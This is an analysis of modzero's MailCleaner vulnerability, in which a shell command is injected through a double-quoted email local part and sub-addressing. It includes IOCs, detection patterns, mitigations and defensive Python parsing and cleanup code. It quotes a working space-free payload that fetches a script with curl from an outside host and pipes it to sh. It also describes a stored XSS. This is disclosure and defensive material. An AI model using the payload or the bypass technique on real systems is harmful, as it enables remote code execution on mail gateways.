Full Report
MailCleaner is an email filtering service. An email address has two parts, the local part and the domain, separated by an @ symbol. The domain part typically contains letters, numbers, hyphens and periods. The local part is more open to interpretation. Typically it allows A-Za-z0-9!#$%&'*+-/=?^_`{|}~. However, when the local part is enclosed in double quotes, the RFC is far more lenient, so odd characters such as "(),:;@[\ become legal. Because of the quotes, many systems parse such an address differently: new characters are accepted, or a comma may split the username. Why does this matter? One mail server may interpret an address differently than other implementations, so we may be able to trick a system into doing unintended things.

Sub-addressing extends a basic email address using the + sign. It allows easy filtering and is very convenient. It is interesting here because the information after the plus may be ignored or dropped.

While looking into MailCleaner, the modzero researchers noticed a call to system() used to clean up file entries. The domain_entry variable passed to that call came from a file path glob, and, as it turned out, the email addresses were being written into file names. That is a command injection point, and the double-quoted local part supplies the bad characters needed for it. There is a problem though: this code was only reachable through a malicious recipient address with a high spam score. That means both MailCleaner itself and the target mail server had to accept the address as valid for the code to be hit. Registering an arbitrary mailbox on the target was obviously too big an ask, so they targeted the Gmail and Outlook mail providers and used sub-addressing to carry the payload. Sadly, neither provider was fully compliant with the specification, and neither allowed a simple command injection; the usable character set was restricted to +&|`${}#*.

That set contains no space character, and everything was lower-cased, which ruled out the usual environment variables. The Dash documentation describes a feature called parameter expansion, which provides substring functionality. The idea was to extract a space from the output of another command: store that output in an environment variable called a, then use the expansion to pull the space back out. After executing a command whose output ended in a particular fashion, we could get those characters: ${a##*d} returns the ending of a, including a space! The final payload ends up being a=`df|tac`&&curl${a##*d}.modzero.com|sh, where the expansion supplies the space between curl and its argument. They had created a reverse shell that was completely compliant with the RFC and contained no spaces. That's pretty amazing! As a bonus, they got a stored XSS on the sender's email address via the extra double-quoted characters.
Analysis Summary
# Tool/Technique: RFC-Compliant Email Command Injection (MailCleaner Exploitation)
## Overview
This technique involves exploiting a Command Injection vulnerability in the MailCleaner email filtering gateway. By leveraging RFC 5322/6532 compliance (specifically double-quoted local parts and sub-addressing), an attacker can bypass input validation and deliver a malicious payload through an email address. This payload triggers an unauthenticated Remote Code Execution (RCE) when the mail server processes high-spam-score emails and performs file cleanup operations using unsanitized file paths.
## Technical Details
- **Type:** Technique (Exploit / Command Injection)
- **Platform:** Linux-based MailCleaner instances (filtering gateway)
- **Capabilities:** Unauthenticated Remote Code Execution, Stored Cross-Site Scripting (XSS), bypass of character restrictions.
- **First Seen:** 2023 (Published by modzero)
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1566 - Phishing
- **TA0002 - Execution**
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- T1203 - Exploitation for Client Execution
- **TA0005 - Defense Evasion**
- T1211 - Exploitation for Defense Evasion
- **TA0003 - Persistence**
- T1133 - External Remote Services
## Functionality
### Core Capabilities
- **RFC-Compliant Payload Delivery:** Uses double quotes in the local part of an email address (e.g., `"payload"@domain.com`) to include characters usually forbidden by mail parsers (`,:;@[\`).
- **Command Injection via Globbing:** Exploits a `system()` call in MailCleaner that uses a file path glob containing the internal `domain_entry` variable, which is populated by the recipient's email address.
- **Space-less Shell Execution:** Utilizes Dash/Shell parameter expansion to bypass the lack of whitespace characters in many mail provider implementations.
### Advanced Features
- **Substring Parameter Expansion:** Uses `${variable##*pattern}` logic to extract spaces from the output of standard system commands (like `df`) to reconstruct a functional command line (e.g., `curl[...] |sh`).
- **Stored XSS:** The same malformed email address used for RCE can trigger a stored Cross-Site Scripting vulnerability in the MailCleaner management interface when the administrator views the logs or sender details.
## Indicators of Compromise
- **File Names:** Files within MailCleaner spool or quarantine directories containing unusual characters like `&`, `|`, or `` ` ``.
- **Network Indicators:**
- `modzero[.]com` (Used in the proof of concept)
- DNS queries for external domains originating from the MailCleaner appliance.
- **Behavioral Indicators:**
- `MailCleaner` processes (specifically periodic cleanup scripts) spawning unexpected child processes like `curl`, `sh`, or `tac`.
- Errors in mail logs related to "double quote" parsing or invalid local parts.
## Associated Threat Actors
- No specific threat groups are currently associated with this exploit; it was discovered and disclosed by security researchers at **modzero**.
## Detection Methods
- **Signature-based detection:** Scanning mail logs for specific patterns in the recipient field: `"+&|[...]"@`.
- **Behavioral detection:** Monitoring for the execution of `system()` or `exec()` calls within mail filtering scripts where the argument contains characters such as `${`, `}`, and `&`.
- **Log Analysis:** Identifying "high spam score" entries in MailCleaner that contain complex shell metacharacters in the local part of the address.
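As an added example (not code from the page or from modzero), a Python parser for the two local-part forms described in the report above (dot-atom and double-quoted, with sub-addressing), with the metacharacter check from this section applied on top. The function names, the `SHELL_META` set and the sample addresses are assumptions constructed for the example:

```python
# Characters a POSIX shell treats specially; any of these in a local part is worth flagging.
SHELL_META = set("&|`$(){}*;<>\\'\"\n")
# Characters RFC 5322 permits in an unquoted (dot-atom) local part.
ATEXT = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
            "!#$%&'*+-/=?^_`{|}~.")

def split_address(addr):
    """Split addr into (local, domain, quoted).

    A double-quoted local part is scanned first so that '@' or backslash-escaped
    characters inside the quotes are not mistaken for the separator; an unquoted
    local part must stay within the dot-atom character set."""
    if addr.startswith('"'):
        i = 1
        while i < len(addr):
            if addr[i] == "\\":
                i += 2  # skip the escaped character
                continue
            if addr[i] == '"':
                break
            i += 1
        else:
            raise ValueError("unterminated quoted local part")
        local, rest = addr[: i + 1], addr[i + 1 :]
        if not rest.startswith("@") or len(rest) < 2:
            raise ValueError("expected '@domain' after quoted local part")
        return local, rest[1:], True
    local, sep, domain = addr.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError("address needs a local part and a domain")
    if not set(local) <= ATEXT:
        raise ValueError("unquoted local part contains non-atext characters")
    return local, domain, False

def local_body(local, quoted):
    """Return the local part without its surrounding quotes."""
    return local[1:-1] if quoted else local

def strip_subaddress(local, quoted):
    """Drop a '+tag' sub-address: the portion a provider may ignore on delivery."""
    return local_body(local, quoted).split("+", 1)[0]

def shell_metachars(addr):
    """Sorted shell metacharacters found in the local part, quoted or not (empty = clean)."""
    local, _domain, quoted = split_address(addr)
    return sorted(set(local_body(local, quoted)) & SHELL_META)
```

Note that `$`, `&`, `` ` ``, `{` and `}` are legal even in an unquoted local part, so the check flags them regardless of quoting, as the policy in the mitigation section suggests.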
## Mitigation Strategies
- **Patching:** Apply updates provided by MailCleaner to address the unsanitized `system()` calls.
- **Input Validation:** Implement strict sanitization on any variable derived from an email address before passing it to shell-executing functions.
- **Principle of Least Privilege:** Ensure that mail processing and cleanup scripts run with the minimum necessary permissions to prevent full system compromise.
- **WAF/Email Gateway Policy:** Block or quarantine emails where the local part contains suspicious shell metacharacters, even if enclosed in double quotes.
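As an added illustration of the input-validation point (written for this page, not MailCleaner's own code, which is not reproduced here), the unsafe cleanup pattern the report describes next to a hardened one, in Python. `cleanup_vulnerable`, `cleanup_hardened`, `demo_hardened` and the spool directory layout are assumptions constructed for the example:

```python
import glob
import os
import tempfile

def cleanup_vulnerable(spool_dir):
    """'Before' pattern, as the report describes it: each globbed entry is pasted
    into a shell command line, so a name such as a=`cmd`&&x is executed by sh."""
    for entry in glob.glob(os.path.join(glob.escape(spool_dir), "*")):
        os.system("rm -f " + entry)  # never do this with attacker-influenced names

def cleanup_hardened(spool_dir):
    """'After' pattern: unlink the entry directly. No shell ever sees the name, so
    backticks, '&&' or '${...}' in it are just bytes. Returns the names removed."""
    removed = []
    for entry in glob.glob(os.path.join(glob.escape(spool_dir), "*")):
        if os.path.isfile(entry):  # skip directories and anything unexpected
            os.remove(entry)
            removed.append(os.path.basename(entry))
    return sorted(removed)

def demo_hardened():
    """Constructed scenario: one spool entry whose name carries the metacharacter
    shape discussed on the page. Returns (names removed, entries left behind);
    with the hardened cleanup the entry is gone and nothing else appears."""
    with tempfile.TemporaryDirectory() as spool:
        bad_name = "a=`touch marker`&&x"  # constructed sample, harmless as a file name
        open(os.path.join(spool, bad_name), "w").close()
        removed = cleanup_hardened(spool)
        return removed, os.listdir(spool)

if __name__ == "__main__":
    print(demo_hardened())
```

Where an external command really is required, pass an argument list (for example `subprocess.run(["rm", "-f", entry], check=True)`) rather than a string, so no shell parses the file name.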
## Related Tools/Techniques
- **Sub-addressing (Plus Addressing):** Using the `+` sign to create unique email aliases.
- **Blind Command Injection:** This technique is often used when command output is not directly visible to the attacker.
- **Living off the Land (LotL):** Using built-in shell features (parameter expansion) to bypass security controls.